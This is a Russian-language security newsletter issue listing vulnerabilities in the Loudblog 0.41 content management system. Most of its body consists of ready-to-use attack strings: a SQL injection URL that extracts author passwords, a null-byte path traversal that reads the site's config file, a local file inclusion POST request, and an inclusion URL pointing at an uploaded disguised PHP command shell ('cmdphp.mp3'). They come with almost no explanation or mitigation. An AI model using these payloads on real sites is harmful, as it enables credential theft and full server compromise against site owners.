Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в Loudblog.


Компьютер для продвинутых пользователей
Содержание:
Loudblog
ПО: Loudblog
Версия: 0.41

О софте:
Loudblog быстрая и легкая в использовании система управления содержанием сайта (CMS) для работы со страничками в веб.
Использование:
SQL Injection в podcast.php (magic_quotes=off):
http://[target]/loudblog/podcast.php?id=1' and '1'='0' union select password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null from lb_authors where '1'='1' /*
Чтение локальных файлов (index.php):
http://[target]/loudblog/index.php?template=../../../loudblog/custom/config.php%00

Локальная инъекция php (loudblog/inc/backend_settings.php):
POST /loudblog/loudblog/inc/backend_settings.php HTTP/1.1
Host: [target]
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
language=../../../index

Закачка фалов:
http://[target]/loudblog/loudblog/index.php?page=/../../../audio/cmdphp.mp3%00
Loudblog
Рассылка создана и ведется при поддержке Информационной сети Пермского края.
Меня можно найти: ICQ - 273214003

В избранное